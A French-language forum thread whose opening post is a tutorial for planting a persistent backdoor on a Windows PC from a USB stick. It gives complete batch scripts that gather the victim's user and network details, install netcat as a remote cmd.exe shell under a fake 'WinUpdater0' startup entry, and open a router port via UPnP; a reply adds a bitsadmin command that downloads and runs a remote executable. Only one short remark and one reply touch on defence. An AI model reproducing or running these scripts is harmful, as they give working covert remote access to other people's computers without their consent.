Annonce

Réduire
Aucune annonce.

Implanter une backdoor avec une clé USB

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Implanter une backdoor avec une clé USB

    Salut à tous.
    Je passe souvent ici pour me tenir au courant des nouveautés en matière de cyber sécurité. Je suis technicien sys/réseau, je bidouille un peu avec mes connaissances de base en système et réseaux. Donc ce tuto s'adresse à des débutants mais possédant un minimum de connaissance de l'informatique.



    Aujourd'hui je vais vous partager un petit projet très simple et rapide qui ne nécessite presque rien mis à par une clé USB et un peu d'imagination.

    Prérequis :
    Avant de commencer vous devez savoir c'est qu'est netcat et l'UpnP.

    NetCat (https://fr.wikipedia.org/wiki/Netcat) : Netcat alias nc, est un utilitaire permettant d'ouvrir des connexions réseau, que ce soit UDP ou TCP. Il est conçu pour être incorporé aisément dans un large panel d'applications. En raison de sa polyvalence, netcat est aussi appelé le « couteau suisse du TCP/IP ». Il existe sur plusieurs systèmes d'exploitation et s'utilise en ligne de commande.

    Upnp (http://assiste.com.free.fr/p/abc/a/upnp.html) : La "norme" UPnP (Universal Plug and Play - reconnaissance automatique des composants de l'ordinateur) est un ensemble de protocoles devant permettre à des systèmes et des équipements d'être mis en réseaux et de collaborer, sans configuration préalable.

    Pour faire simple : netcat est le logiciel de contrôle à distance et Upnp est le protocole réseau qui vas nous permettre d'ouvrir un port afin de traverser la NAT.


    1 - Collecte des informations sur la cible


    En toute logique vous avez un accès physique à la machine cible. Donc nous allons récolter quelques informations basiques sur le poste à l'aide d'un script batch :

    echo off for /F "tokens=16" %%i in ('"ipconfig | findstr IPv4"') do SET LOCAL_IP=%%i FOR /F "tokens=1,2 delims= " %%A IN ('nslookup myip.opendns.com resolver1.opendns.com') DO IF "%%A"=="Address:" SET EXTIP=%%B set /p=%EXTIP%<NUL|clip echo ------------------------------------------------ >> cible_pc.txt echo. echo INFORMATION SYSTEME ET UTILISATEUR >> cible_pc.txt echo. echo ------------------------------------------------ >> cible_pc.txt echo. echo %USERNAME% >> cible_pc.txt echo *************************** >> cible_pc.txt echo %COMPUTERNAME% >> cible_pc.txt echo *************************** >> cible_pc.txt echo %DATE% >> cible_pc.txt echo *************************** >> cible_pc.txt echo %TIME% >> cible_pc.txt echo *************************** >> cible_pc.txt echo %LOCAL_IP% >> cible_pc.txt echo *************************** >> cible_pc.txt echo %EXTIP% >> cible_pc.txt echo *************************** >> cible_pc.txt echo %USERDOMAIN% >> cible_pc.txt echo *************************** >> cible_pc.txt echo %OS% >> cible_pc.txt echo *************************** >> cible_pc.txt net use >> cible_pc.txt echo --------------------END--------------------- >> cible_pc.txt exit
    Rien de compliquer ici, on récupère les IP LAN et WAN et quelques infos utiles.

    2 - Créer le script pour implanter notre backdoor

    Nous allons créer ce script afin de l'utiliser avec une archive SFX (.exe) que nous pourrons exécuter en administrateur. Si vous ne connaissez pas SFX vous pouvez lire cet article : http://www.fredzone.org/si-vous-tenez-a-votre-pc-ninstallez-pas-winrar-554 et regarder cet video : https://www.youtube.com/watch?v=fo0l0oT4468

    Passons au choses sérieuses :

    echo off for /F "tokens=16" %%i in ('"ipconfig | findstr IPv4"') do SET LOCAL_IP=%%i FOR /F "tokens=1,2 delims= " %%A IN ('nslookup myip.opendns.com resolver1.opendns.com') DO IF "%%A"=="Address:" SET EXTIP=%%B set /p=%EXTIP%<NUL|clip cd %ProgramFiles(x86)%/d56f496e87f4546f56 copy /y nc.exe "%SYSTEMROOT%/System32" copy /y upnpc-static.exe "%SYSTEMROOT%/System32" REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdater0" /t "REG_SZ" /d "%SYSTEMROOT%\System32\nc.exe -d -L -e cmd.exe -p 27" upnpc-static.exe -a %LOCAL_IP% 27 27 TCP shutdown -r -t 30
    vous aurez au préalable préparer un exécutable SFX qui vas copier les fichiers dans %ProgramFiles(x86)%/d56f496e87f4546f56.

    Ce que fait ce script : il récupère l'IP LAN du poste, copie la backdoor dans system32 puis ajoute netcat au démarrage via le registre et enfin il ouvre le port 27 sur le routeur de la cible. Le script se termine par un redémarrage de la machine. Oui oui je n'ai pas trouvé comment l’exécuter en arrière plan sans passer par le reboot du pc ... mais vous allez m'aidez pas vrai ?

    Une fois le pc redémarré l'attaquant peu se connecter à distance

    3 - Se connecter

    Alors là c'est simple : nc IP_WAN 27



    source : http://null-byte.wonderhowto.com/how...tools-0148657/

    Ce petit trick ne peut pas s'appliquer partout car il faut que le routeur autorise UpnP. J'ai testé derrière un petit routeur TPLINK avec une nat et j'ai pu me connecter . Après c'est pas très abouti comme projet mais c'est plus pour le principe et vous montrer que l'UpNp c'est pas cool.
    Au passage il est tout à fait possible de désactiver ce protocole sur les box des FAI : https://assistance.sfr.fr/internet-e...iver-upnp.html

    J'attend avec impatience vos remarques et conseils. Ce forum m'a permis de découvrir plein de choses alors ceci une est une petite contribution.

    Si vous voyez des fautes dites le moi et je les corrigerais
    Un million de kilomètres commencent toujours par un pas.

  • #2
    J'ai oublié de vous dire comment utiliser ces scripts alors je le rajoute :


    Vous avez vos scripts dans l'archive SFX avec vos exe.
    Il suffit de copier le script de collect d'info et votre SFX dans la clé USB, ensuite on branche la clé puis on lance les deux programmes. L'un permettant d'obtenir l'IP et le SFX permettant d'installer la backdoor. Ce sera peut être plus claire pour les débutants.
    Un million de kilomètres commencent toujours par un pas.

    Commentaire


    • #3
      Bonjour et merci pour le tutoriel...

      Petite question : Que peux-tu faire une fois connecté sur la machine cible ? à l'aide de quoi ? Quelles commandes ?

      Commentaire


      • #4
        La next step est de te faire passer pour un keyboard et exécuter ton code directement au branchement de la clé (anciennement l'autorun ^^)


        Suivre Hackademics: Twitter, Google+, Facebook.

        Commentaire


        • #5
          Envoyé par _47 Voir le message
          La next step est de te faire passer pour un keyboard et exécuter ton code directement au branchement de la clé (anciennement l'autorun ^^)
          Salut _47,

          keyboard ?

          Commentaire


          • #6
            Clavier* pardon ^^

            Le must est tout de même : https://hakshop.com/products/usb-rubber-ducky-deluxe
            Je crois qu'il y a moyen d'en faire un équivalent en bidouillant un certain type de clé usb


            Suivre Hackademics: Twitter, Google+, Facebook.

            Commentaire


            • #7
              Super intéressant. Je testerai quand j'aurais un peu le temps et je te ferais un retour.

              Merci !

              Cordialement,

              Jeriko

              Commentaire


              • #8
                Envoyé par fred Voir le message
                Bonjour et merci pour le tutoriel...

                Petite question : Que peux-tu faire une fois connecté sur la machine cible ? à l'aide de quoi ? Quelles commandes ?
                Une fois connecter on peut exécuter toutes les commandes du DOS (l'utilisateur est l'admin). Je n'ai pas exploré toutes les commandes de netcat mais il me semble qu'il est capable de faire plein de choses et même de télécharger et d'uploader des fichiers sur la machine.
                http://null-byte.wonderhowto.com/how...tools-0148657/
                https://www.geeek.org/netcat-l-outil...-ls-cd-rm.html

                Envoyer un fichier entre deux machines

                Serveur 1 :
                1 nc -lp 1234 > monfichier.zip
                Serveur 2 :
                1 nc -w 1 server1.example.com 1234 < monfichier.zip

                En parlant de sa j'ai justement découvert un programme inclus dans Windows permettant de déclencher un téléchargement.

                Code:
                cmd.exe /C "%windir%\System32\bitsadmin.exe /transfer downloader /priority normal http://site.fr/dl/prog.exe %temp%\setup.exe & %temp%\prog.exe"
                (je n'ai plus la source)



                Un million de kilomètres commencent toujours par un pas.

                Commentaire


                • #9
                  Envoyé par _47 Voir le message
                  La next step est de te faire passer pour un keyboard et exécuter ton code directement au branchement de la clé (anciennement l'autorun ^^)
                  Oui comme le fait l'USB Rubber Ducky Mais sa dépasse mes compétences de technicien. Effectivement si il y avait moyen de le faire sur une clé sans trop sortir le fer à souder je serais intéressé.
                  Quand on y pense l'autorun de XP a du causer bien des problèmes aux sys admin ...
                  Sinon j'ai vu les keyloggers USB et PS2 sur amazon, mais c'est plus sympa de le faire par soi-même.
                  Un million de kilomètres commencent toujours par un pas.

                  Commentaire


                  • #10
                    Il semblerait que se soit l'option -e de netcat permettant d'exécuter un programme interne à l'OS, tu as essayé cette option, il semblerait que sur Windows, il y a quelques problèmes (je ne suis pas sous windows).

                    Commentaire


                    • #11
                      En effet il est possible de lance des programmes interne à Windows.
                      J'ai pris 5 minutes pour faire un test et une demo d'exploitation de netcat sous Windows : https://youtu.be/I00Ve6Rg6i0

                      Un million de kilomètres commencent toujours par un pas.

                      Commentaire


                      • #12
                        evolutio : concernant l'autorun et windows, la parade est de désactiver tous les contrôleurs apparaissant sur les panneaux avants des machines physiques (plus fréquemment sur les serveurs). Ainsi que les lecteurs de CD et autres.

                        Tu les réactive en SSH quand tu pourrais en avoir besoin. La solution est encore mise en place dans certaines infrastructures (PME ou écoles par exemple) qui ne peuvent pas garantir une sécurité complète de la salle serveur (comme un datacenter le ferait).

                        Commentaire

                        Chargement...
                        X